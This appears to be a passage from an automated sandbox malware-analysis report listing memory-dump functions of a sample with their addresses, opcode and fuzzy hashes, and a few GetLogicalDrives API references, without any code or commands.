                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: dddc687596a3199808a7a73f43a92ee4b3e6cefa2ae2157c45337342277912e7
                                                      • Instruction ID: 87db21e8cf9064ef1ae15d3643addb10c1009b564231cd181fe75091c001cd14
                                                      • Opcode Fuzzy Hash: dddc687596a3199808a7a73f43a92ee4b3e6cefa2ae2157c45337342277912e7
                                                      • Instruction Fuzzy Hash: 780149F605D2559F9712966A07559FA7F3CA983238B7048EAF146CA403E2C80A4A8231
                                                      Function 0794030B Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 0a1a0c870dda0b0f08ee1ef1427ab7f41ae51b89d615e656f48438167fdc0d0d
                                                      • Instruction ID: 40a1a8036d443d1370afe3e3feaee44a73abede8dc4aebe72e2a268d17d60769
                                                      • Opcode Fuzzy Hash: 0a1a0c870dda0b0f08ee1ef1427ab7f41ae51b89d615e656f48438167fdc0d0d
                                                      • Instruction Fuzzy Hash: 89118CF280D3989FD712967917659FA7F3C9947734B2548FAE906DB013E18909098231
                                                      Function 079402E2 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 7cda4dbb31a15d6dde466d21dca58c4ee0f396156d47a4c1b742189ed375df84
                                                      • Instruction ID: c42db9710715745e98f261a4b66f7f5b8d8e8169d59f5720950cbc20b7b60ffc
                                                      • Opcode Fuzzy Hash: 7cda4dbb31a15d6dde466d21dca58c4ee0f396156d47a4c1b742189ed375df84
                                                      • Instruction Fuzzy Hash: 290189F606D255DFD7029B6A03559FA7F3CA987238B744CEAF202CA403E2C80A498231
                                                      Function 07940365 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 8bef00afdcd9f4e196c47a90d1ee1fac1196084e4ae8a71b6bfbd71b95b22295
                                                      • Instruction ID: e4bcc4b2ef13884e9901b58e860437545bd4c08cb3da3b9b69821daeb795d638
                                                      • Opcode Fuzzy Hash: 8bef00afdcd9f4e196c47a90d1ee1fac1196084e4ae8a71b6bfbd71b95b22295
                                                      • Instruction Fuzzy Hash: E90147F604E3919FD3029A764B24AEA3F38A8C363077508EBE001CA413F288084E8231
                                                      Function 0794034F Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: d8098b3d104879eb4604116605e1103c8d8fd5d4a1099fd44b0b3cc91d6129d6
                                                      • Instruction ID: 7ac72f89c33f3f15e558e4d9fcdb57c429dfd4c729671eae3e181298dbe3eee0
                                                      • Opcode Fuzzy Hash: d8098b3d104879eb4604116605e1103c8d8fd5d4a1099fd44b0b3cc91d6129d6
                                                      • Instruction Fuzzy Hash: 55017BF600C3919FD71296750755AFA3F38A983238F7408FAF142CA503E2C8094E4231
                                                      Function 0794038F Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 079403D1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441238875.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7940000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: ee5fd782348a4d5b56ca2ecc38c43459ed4ddc2ebb55a6607e82ea07c27631a4
                                                      • Instruction ID: a2cf67584391cfe8449e3412ea4b3ba56d85e7c83e6b1a91e3c3fe2bc9b5c223
                                                      • Opcode Fuzzy Hash: ee5fd782348a4d5b56ca2ecc38c43459ed4ddc2ebb55a6607e82ea07c27631a4
                                                      • Instruction Fuzzy Hash: 52F027B241D39ACFC702AB7A56655D93F78AD83224BA508EEE040CB413E259488AC725
                                                      Function 0792097E Relevance: .2, Instructions: 239COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5e29cd041c7d0614d4a3b6065a898749775baaeb7d5af4d14bacf33d8cfe74e
                                                      • Instruction ID: 385bd663c6aac4a84395d8bf86aef42e0fb8042da5cf26d342391fb03c80a9b9
                                                      • Opcode Fuzzy Hash: a5e29cd041c7d0614d4a3b6065a898749775baaeb7d5af4d14bacf33d8cfe74e
                                                      • Instruction Fuzzy Hash: F04109EB42C034BC6552F5886B546FA7B6EE5D3339B304C22F803E661AE2D44A4B7131
                                                      Function 07920992 Relevance: .2, Instructions: 236COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f2c523ce131a2e6d8e10e83823e2f6e8e33cd77e2a6af5a027caf8c7262843ab
                                                      • Instruction ID: 9b09c74392c24b920efb7bc6c21c2cf3ab388bec0b0cffaa0d32f82a74be640a
                                                      • Opcode Fuzzy Hash: f2c523ce131a2e6d8e10e83823e2f6e8e33cd77e2a6af5a027caf8c7262843ab
                                                      • Instruction Fuzzy Hash: 5C413EEB42C134BD6552E5882B546FB7B6EE6D7338B304C26F803E661AE2D44E4B7131
                                                      Function 0792097C Relevance: .2, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8880a089ca56b46327699055d1dfbce2e057c617a29adabc9317dd36d77794a
                                                      • Instruction ID: c99d4183dd5216daf3eec72b8787ad300af1457709252177194d0b2cfa162a07
                                                      • Opcode Fuzzy Hash: f8880a089ca56b46327699055d1dfbce2e057c617a29adabc9317dd36d77794a
                                                      • Instruction Fuzzy Hash: 2241EAEB42C134BC6552F5892B54AFA7B6EE5D7339B304822F803E661AE2D44E4B7131
                                                      Function 07920A14 Relevance: .2, Instructions: 224COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eef7a1d2dc49998fa31dff1f0d66d5d4b8670234681f6e6c58cf5e73578913fd
                                                      • Instruction ID: c13204769a1cf0bd4e05e6ea7dc2fd23c869abe6e1024331c039deb73cc6e3d5
                                                      • Opcode Fuzzy Hash: eef7a1d2dc49998fa31dff1f0d66d5d4b8670234681f6e6c58cf5e73578913fd
                                                      • Instruction Fuzzy Hash: 4B41FCEB42C034BC6552F5892B546FA6B6EE6D7338B304C26F803E661EE2D54E4B7131
                                                      Function 079209CD Relevance: .2, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb0189105d2859628e97477eeea304979758235fd0a17e3ee13f1e991de9f9e9
                                                      • Instruction ID: 42c30cb4b0edfa9d52314ab1b38d9cb92e48c01eb0adabcfa35804b5ae9dadfb
                                                      • Opcode Fuzzy Hash: bb0189105d2859628e97477eeea304979758235fd0a17e3ee13f1e991de9f9e9
                                                      • Instruction Fuzzy Hash: 034130EB41C034BC6552E5882B54AFA7B6EE5D3339B304C66F803D661AE2D44E4B7131
                                                      Function 079209BE Relevance: .2, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6a78431c78f66022f1710b0c58d085824c257103555334513aca4f1fee9a232
                                                      • Instruction ID: da96e8f95461854b66a13ff677bf1e91b903063a70d92a0a5dc7d75ff4f00704
                                                      • Opcode Fuzzy Hash: c6a78431c78f66022f1710b0c58d085824c257103555334513aca4f1fee9a232
                                                      • Instruction Fuzzy Hash: 75411BEB42C034BC6552F1882B546FA7B6EE5D7339B304C22F803E661AE2D54E4B7131
                                                      Function 079209E6 Relevance: .2, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0bedc6a8b5c738af725f576ef9e068e774af52662ec20610f574711c0b83db4c
                                                      • Instruction ID: 4a02f69a49e8fd6f84e0bcb2c9b932aba62194c9b431243e67aeab6ee90d9aa7
                                                      • Opcode Fuzzy Hash: 0bedc6a8b5c738af725f576ef9e068e774af52662ec20610f574711c0b83db4c
                                                      • Instruction Fuzzy Hash: 05414DEB41C034BC6562E1882B546FA7B6EE5D3338B304C26F803D661AE2D54E4B7131
                                                      Function 07920A02 Relevance: .2, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: befb57ea0d24f3067f1910a4c92d897c1831ee4d95e4c3764a13f1ed6a055cc5
                                                      • Instruction ID: 98e514b7aaa586dacd4d1a029dfa662b8a4b2931feee7bf18074f6a7bca65b59
                                                      • Opcode Fuzzy Hash: befb57ea0d24f3067f1910a4c92d897c1831ee4d95e4c3764a13f1ed6a055cc5
                                                      • Instruction Fuzzy Hash: 90412EEB42C034BC6552E5882B54AFA7B6EF5D3339B304C26F803D661AE2D44E4B7131
                                                      Function 07920A24 Relevance: .2, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: add3ce99dc9cf8c0b4be93193cda1f36779f96354a10e26fbc2f07b63701d20b
                                                      • Instruction ID: da34a718b97a161dc166d37819df1dbfbd5c8884d456a263ed5ecf251a8f9a22
                                                      • Opcode Fuzzy Hash: add3ce99dc9cf8c0b4be93193cda1f36779f96354a10e26fbc2f07b63701d20b
                                                      • Instruction Fuzzy Hash: 97412DEB01C034BD6552E5882B54AFB7B6EE6D3339B304C26F803E661AE2D54E4B7130
                                                      Function 07920A5C Relevance: .2, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6129b06a7b1b56810b9fe74f17a39392d2eacd04b41c177f4c128120b2d8df6
                                                      • Instruction ID: 72437edea5fbc88e0aafa6c30b59d936ab91d35922b0a183d2e980981e270949
                                                      • Opcode Fuzzy Hash: d6129b06a7b1b56810b9fe74f17a39392d2eacd04b41c177f4c128120b2d8df6
                                                      • Instruction Fuzzy Hash: FB31EAEB01C034BD6562E5892B54AFA776EE6D3338B304827F803E6619E2D44E4B7131
                                                      Function 07920A6A Relevance: .2, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 951c3e0211d5858a2dd0f86e3514af70421feb42195e96168af17cfe2d1baa90
                                                      • Instruction ID: 7bcb8b3e7ab01c216354ce54d6948e3700437d57a375af30edabce81466cb166
                                                      • Opcode Fuzzy Hash: 951c3e0211d5858a2dd0f86e3514af70421feb42195e96168af17cfe2d1baa90
                                                      • Instruction Fuzzy Hash: DE310AEB01C035BD6562E5892B54AFA7B6EE1D3338B304826F843D661AE2D44E4B7131
                                                      Function 07920A82 Relevance: .2, Instructions: 172COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40dce34533b4fe51c4e7e39d0b0b1ec807c2d994696bf4b3ef3ba0890772f447
                                                      • Instruction ID: 8a095458c4651d12283978b260fd60b065f19e3b6c07fb09975823fad1cb9c76
                                                      • Opcode Fuzzy Hash: 40dce34533b4fe51c4e7e39d0b0b1ec807c2d994696bf4b3ef3ba0890772f447
                                                      • Instruction Fuzzy Hash: CB31E7EB01C135BD6562E5892B54AFA7B6EE2D3338F304C26F803E6619E2D54E4B7131
                                                      Function 07920AB8 Relevance: .2, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9d5d89fabdb5c13d0c8ce5b6a55cec128912c45a8e02a016eec866f8627cdbe
                                                      • Instruction ID: 9de2dfc20047b1782094e245f8ccca599b80647d78a350c24dc9ca3573718259
                                                      • Opcode Fuzzy Hash: e9d5d89fabdb5c13d0c8ce5b6a55cec128912c45a8e02a016eec866f8627cdbe
                                                      • Instruction Fuzzy Hash: 0C3139FB42C134AD6656E5882750AFA7B6EE6D3338F304C26F803A661AD2D00E4B7131
                                                      Function 07920AD8 Relevance: .1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b27394f42931e3ebb89e03489229354180ec4177c8844166675440430798fead
                                                      • Instruction ID: 4830b35538080485bc59d0074d6640bcbdb3e340ca9ea844e0254a169feb0c24
                                                      • Opcode Fuzzy Hash: b27394f42931e3ebb89e03489229354180ec4177c8844166675440430798fead
                                                      • Instruction Fuzzy Hash: BE2139EB02C034AD6662F18827606FA7B6EE6D7338F304C62A807A7619D2D00E4B7131
                                                      Function 07920B0E Relevance: .1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dcb2b464f0d0366362826d78d602ce12d535a91fca328169f21c5b0d76bfe1ae
                                                      • Instruction ID: e0e263ef2e624a7e55e7407b963447a9751a13e389e4ded3f6042018ed18d948
                                                      • Opcode Fuzzy Hash: dcb2b464f0d0366362826d78d602ce12d535a91fca328169f21c5b0d76bfe1ae
                                                      • Instruction Fuzzy Hash: 36214CEB02C134ADA662F18817546F97B6AE69733DF300862E843AB629D1D00E4B7121
                                                      Function 07920AF3 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d60fe9b2d8f7e14ed3b5c21bca937ec833af4a64b3fa54476caa443e1ffddbc9
                                                      • Instruction ID: e7765e7736a579ffff817d8b3f05fb70ed71b1362dc0c00d4b4e2c9db785870e
                                                      • Opcode Fuzzy Hash: d60fe9b2d8f7e14ed3b5c21bca937ec833af4a64b3fa54476caa443e1ffddbc9
                                                      • Instruction Fuzzy Hash: 7B215CFB42C134AD5662F58C57506FA7B69E69733CF300C66E8436B629D2D00E477121
                                                      Function 079B0CF2 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c8bffa9cd2c1646e7365958b0f157a7f51d88fe06528a696945c45e36eb0f38
                                                      • Instruction ID: a03c65a4fe7ef559d658155f164698685eab3ca83d6e6dbc3bd10e9bdecacab6
                                                      • Opcode Fuzzy Hash: 4c8bffa9cd2c1646e7365958b0f157a7f51d88fe06528a696945c45e36eb0f38
                                                      • Instruction Fuzzy Hash: 2721ADE72583506D9263509C57106FB6F6EF7D3734B758827F402DB283E3C59A094272
                                                      Function 07920B66 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57443d39e1e34da000258d132f40949a3454446b2e4fc9c08b95af288c4afeee
                                                      • Instruction ID: 7061005cf78ea476b0d1a80c6907ca32e56d0c7094e9677a4893021da3b4e33a
                                                      • Opcode Fuzzy Hash: 57443d39e1e34da000258d132f40949a3454446b2e4fc9c08b95af288c4afeee
                                                      • Instruction Fuzzy Hash: 08213AEB02C134BD69A2F58C17506FA7A6AA69733DF300C62B847A762AD2D04D477121
                                                      Function 079B0CC2 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b94c08cdbbf2f9e8254a133448945e7b27a8c2d184a7bd61d01738d1cbf4df2a
                                                      • Instruction ID: 40e8f3fc6d8b7be08211fbc813fd48855c7f05fb82a6c4f549f41f4f1060382d
                                                      • Opcode Fuzzy Hash: b94c08cdbbf2f9e8254a133448945e7b27a8c2d184a7bd61d01738d1cbf4df2a
                                                      • Instruction Fuzzy Hash: C82138EB25C3103DB25284985F10AFB1B6FE7D3634731882BF406C6283E2D98E4E5231
                                                      Function 079B0CB9 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 730c1965ef6300e85aa5b4576c219cfa2cd97dac70197e72db9ac196a19cc09e
                                                      • Instruction ID: 339b8935e82b3d217cb4528ac82d8bac96f7a1d9e1c7c0374f7e96a3287d8c16
                                                      • Opcode Fuzzy Hash: 730c1965ef6300e85aa5b4576c219cfa2cd97dac70197e72db9ac196a19cc09e
                                                      • Instruction Fuzzy Hash: 231136EB2582203CB55244885B10AF75B6FF7D3634730C92BF402C6243E2D59E4E5231
                                                      Function 079B0CD0 Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441348357.00000000079B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_79b0000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d44fa280743e7fcc332be16d30938f11aadc7ac5ba815ef70ff82a6fed8c7e16
                                                      • Instruction ID: b2b04d6c6f190fa22f2d08694260efd99df85e60cea790444e3a3b6b85a8fc13
                                                      • Opcode Fuzzy Hash: d44fa280743e7fcc332be16d30938f11aadc7ac5ba815ef70ff82a6fed8c7e16
                                                      • Instruction Fuzzy Hash: 151157EB2583203CB11240986B109FB6B6FF6D3734331C82BF406C6643E2D99E4E5232
                                                      Function 07920BB4 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24e8bcf677ab4fcb311ff67f787c4c5c62c5ed88bd0637645e5e87580e1e3787
                                                      • Instruction ID: 9d36208ff24fdf15d6033d7dc8a0a32cff5e8535679fb8de14eeef5495483e4b
                                                      • Opcode Fuzzy Hash: 24e8bcf677ab4fcb311ff67f787c4c5c62c5ed88bd0637645e5e87580e1e3787
                                                      • Instruction Fuzzy Hash: 78115CF602C034ADA612F58D17546FA3BA9A7D3338F304C66A84297569D2D149477132
                                                      Function 07920B75 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fd6612fcbb747639c7a61b19caea892c2fd4b79f87206e2c5ae1e0d5dde74af
                                                      • Instruction ID: ea584a63fb3cc61102e64ca1f4daa6ed39faeed0efa67b00353404226655ae7a
                                                      • Opcode Fuzzy Hash: 9fd6612fcbb747639c7a61b19caea892c2fd4b79f87206e2c5ae1e0d5dde74af
                                                      • Instruction Fuzzy Hash: EF119EE702C034BDA652E5C817947FA3B6AA793339F300C66A8436A65ED1D50E4B7131
                                                      Function 07920B9D Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fe47113c1d216289b36d9043e43921ee87204bbf151ef697f2273309a72fde6
                                                      • Instruction ID: a5c55c45acaba2ad1861e1ae731ec03aa48f9008e6ccc0cf31da770658e300b9
                                                      • Opcode Fuzzy Hash: 2fe47113c1d216289b36d9043e43921ee87204bbf151ef697f2273309a72fde6
                                                      • Instruction Fuzzy Hash: 391157F6028034AEA652F58D17546FA3BAAA7D3338F304C2AA843A7169D2D14D4BB131
                                                      Function 07920B48 Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 261e27cd08262e306f72bb900aae663acb364dc394efd1c37f07f4fe3dc18e05
                                                      • Instruction ID: 713e6ee474343d1ab8df3c8f7bc9f95c1f387471c647c87e37ac177c7085175a
                                                      • Opcode Fuzzy Hash: 261e27cd08262e306f72bb900aae663acb364dc394efd1c37f07f4fe3dc18e05
                                                      • Instruction Fuzzy Hash: BF119EFB02C134AED703FA985B542FA3BB4D6D3338B304C66D842A716AD5E14D4BA231
                                                      Function 07920B8B Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1441210614.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7920000_NWJ4JvzFcs.jbxd
